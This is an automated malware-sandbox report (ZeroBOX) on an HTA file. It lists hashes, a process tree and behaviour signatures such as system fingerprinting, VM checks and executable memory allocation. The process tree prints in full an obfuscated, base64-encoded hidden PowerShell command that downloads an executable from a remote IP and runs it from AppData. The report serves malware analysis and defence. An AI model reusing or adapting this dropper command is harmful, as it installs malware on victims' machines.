Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 19, 2023, 6:03 p.m.	Sept. 19, 2023, 6:06 p.m.

Size	5.3KB
Type	data
MD5	`641f5cc1f7858be8774ec7dc33948914`
SHA256	`d6b0ff46a400677e3bfc9bbe37016956b448be70e4272e63f5b04dabcc3870e0`
CRC32	`5E5D0C54`
ssdeep	`96:fOYNModO8XYoDnevC/zliYSZC6H3rLlECU/2:f5Wh8IoDnev6ixZC6H3FI2`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\TiWorker.hta.html
2260
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2260 CREDAT:145409
  2388
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
    2128
    - powershell.exe powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
      2588

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 19, 2023, 6:04 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000419e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fe8a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fe8a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fe8a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fe830 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fe830 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fed00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fed00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fed00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fed00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff160 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff160 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff160 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fee50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fee50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3fee50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff5c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff5c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff5c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3e8450 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3e8450 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff160 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3ff160 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3e83e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3e83e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3e83e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b429c60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b429c60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b429cd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b429cd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42a7c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42a7c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42ab40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42ab40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000419c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000419c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000419c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000419c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4459a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 6:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4459a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 19, 2023, 6:04 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 295 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 region_size: 11669504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002e10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000037b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003930000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
